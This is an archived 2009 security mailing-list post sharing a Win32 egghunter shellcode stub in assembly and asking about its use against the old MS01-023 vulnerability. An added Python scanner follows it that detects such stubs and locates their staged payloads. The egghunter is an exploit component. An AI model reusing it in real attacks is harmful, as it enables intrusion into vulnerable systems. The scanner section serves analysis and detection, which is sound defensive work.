Dailydave mailing list archives
Merry Xmas & Happy "Search Memory for your Shellcode"...
From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:16:08 -0200
Hey, fellows. I got some spare time to work with a well-known technique called "egghunt", based on skape's excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023), the egghunt doesn't work as well as I was expecting.

The code:

    ; Egghunter stub: walks the address space upward from 0, probing each
    ; page with an int 2Eh syscall before touching it, and looks for the
    ; doubled badge ("NBNB" twice) that marks the start of the staged code.
    win32_syscall_forward_01 PROC
    start:
        xor     edx, edx        ; zeroing the edx, it is necessary to avoid BO in 'Release'
    inc_page:
        or      dx, 0FFFh       ; add PAGE_SIZE-1 to edx
    inc_byte:
        inc     edx             ; increment our pointer by one
    setup_syscall:
        push    edx             ; save edx on the stack
        push    02h             ; push NtAccessCheckAndAuditAlarm
        pop     eax             ; pop into eax
        int     2Eh             ; perform the syscall (KiSystemService())
        cmp     al, 05h         ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)?
        pop     edx             ; restore edx
        je      inc_page        ; yes, invalid pointer, go to the next page
    setup_badge:
        mov     eax, "NBNB"     ; throw our badge in eax
    check_badge:
        mov     edi, edx        ; set edi to the pointer we validated
        scasd                   ; compare the dword in edi to eax (edi advances by 4)
        jnz     inc_byte        ; no match? increment the pointer by one
        scasd                   ; compare the dword in edi to eax again - edi is now edx + 4
        jnz     inc_byte        ; no match? increment the pointer by one
    badge_found:
        jmp     edi             ; found the badge, jump 8 bytes past it into our code
    win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the place" BO happens to the end of STACK. Am I right? But in this vulnerability the stager shellcode will be placed somewhere at the BOTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
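From the analyst's side, the same egghunter is a useful artifact to recognise in a captured payload or a memory dump: the stub's byte sequence is fixed apart from the four-byte badge, and once you have the badge you can find the doubled marker and hence the staged code the hunter would have jumped to. The following scanner is an added example written for this page, not code from the original post; the byte pattern is my own encoding of the assembly above (the egg immediate after the `mov eax` opcode is wildcarded), and the buffer it scans is a constructed sample with NOP/int3 filler standing in for the staged code.

```python
"""Locate skape-style egghunter stubs and their staged payloads in a byte buffer.

Added example, not part of the original post. EGGHUNTER_RE is an assumed
(hand-assembled) encoding of the win32_syscall_forward_01 stub shown above,
starting at the 'or dx, 0FFFh' instruction so that any prologue before it
(e.g. the 'xor edx, edx') does not matter.
"""
import re
from typing import Dict, List, Tuple

# Machine code of the egghunter from the post, egg value wildcarded.
EGGHUNTER_RE = re.compile(
    rb"\x66\x81\xca\xff\x0f"    # or   dx, 0FFFh
    rb"\x42"                    # inc  edx
    rb"\x52"                    # push edx
    rb"\x6a\x02"                # push 02h
    rb"\x58"                    # pop  eax
    rb"\xcd\x2e"                # int  2Eh
    rb"\x3c\x05"                # cmp  al, 05h
    rb"\x5a"                    # pop  edx
    rb"\x74\xef"                # je   inc_page
    rb"\xb8(.{4})"              # mov  eax, <egg>   (captured as group 1)
    rb"\x8b\xfa"                # mov  edi, edx
    rb"\xaf\x75\xea"            # scasd / jnz inc_byte
    rb"\xaf\x75\xe7"            # scasd / jnz inc_byte
    rb"\xff\xe7",               # jmp  edi
    re.DOTALL,                  # the egg may contain any byte, including newline
)


def find_egghunters(buf: bytes) -> List[Tuple[int, bytes]]:
    """Return (offset, egg) for every egghunter stub found in buf."""
    return [(m.start(), m.group(1)) for m in EGGHUNTER_RE.finditer(buf)]


def find_staged_payloads(buf: bytes, egg: bytes) -> List[int]:
    """Return the offsets the hunter would jump to: 8 bytes past each doubled egg."""
    marker = egg * 2
    return [m.start() + len(marker) for m in re.finditer(re.escape(marker), buf)]


def scan(buf: bytes) -> List[Dict[str, object]]:
    """Pair each stub with the payload offset(s) its egg points at."""
    report = []
    for stub_off, egg in find_egghunters(buf):
        report.append({
            "stub_offset": stub_off,
            "egg": egg,
            "payload_offsets": find_staged_payloads(buf, egg),
        })
    return report


def build_sample() -> bytes:
    """Constructed buffer: filler, the stub (with its xor prologue), a gap,
    then the doubled egg followed by placeholder 'stage' bytes (NOPs + int3)."""
    egg = b"NBNB"
    stub = (b"\x31\xd2"                                  # xor edx, edx
            b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58"
            b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" + egg +
            b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
    staged = egg * 2 + b"\x90" * 8 + b"\xcc"             # placeholder, constructed
    return b"\x41" * 64 + stub + b"\x00" * 200 + staged + b"\x00" * 32


if __name__ == "__main__":
    for finding in scan(build_sample()):
        print(f"egghunter stub at 0x{finding['stub_offset']:x}, egg={finding['egg']!r}, "
              f"staged code at {[hex(o) for o in finding['payload_offsets']]}")
```

The pattern deliberately starts at `or dx, 0FFFh` rather than at `xor edx, edx`, because a hunter may be prefixed by a different prologue; the wildcarded egg is what lets a single signature cover any badge value, and recovering it from the stub is what tells you which doubled marker to search for next.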
Current thread:
- Merry Xmas & Happy "Search Memory for your Shellcode"... Nelson Brito (Dec 23)